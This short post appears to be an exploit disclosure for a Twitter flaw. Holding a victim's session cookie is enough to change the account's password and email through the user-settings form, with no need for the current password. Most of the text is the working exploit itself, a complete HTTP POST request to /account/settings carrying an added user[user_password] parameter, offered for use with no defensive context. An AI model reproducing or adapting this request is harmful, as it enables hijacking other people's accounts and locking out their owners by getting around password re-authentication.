Twitter password change exploit

in

Vulnerability: just having the twitter session ID, it is possible the change all of these without knowing the actual password.
This is done by using the "user settings" interface instead of the one meant to change your password.
Just add an extra user[user_password] variable to the post, and voila.

Exploit:

POST /account/settings HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Referer: Twitter
Accept-Language: hu-HU
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: twitter.com
Content-Length: 366
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: lang=en; _twitter_sess=session-id;

authenticity_token=f3c466 7fd7b4231d279159af8ce76a8 5d06631b9&user%5Bname%5D= yourname&user%5Bscreen_na me%5D=username&user%5Bema il%5D=whatever@yourmail.c om&auth_password=&user%5B time_zone%5D=Greenland&us er%5Burl%5D=&user%5Bdescr iption%5D=&user%5Blocatio n%5D=&user%5Blang%5D=en&u ser%5Bprotected%5D=0&comm it=Save&user%5Buser_passw ord%5D=new_password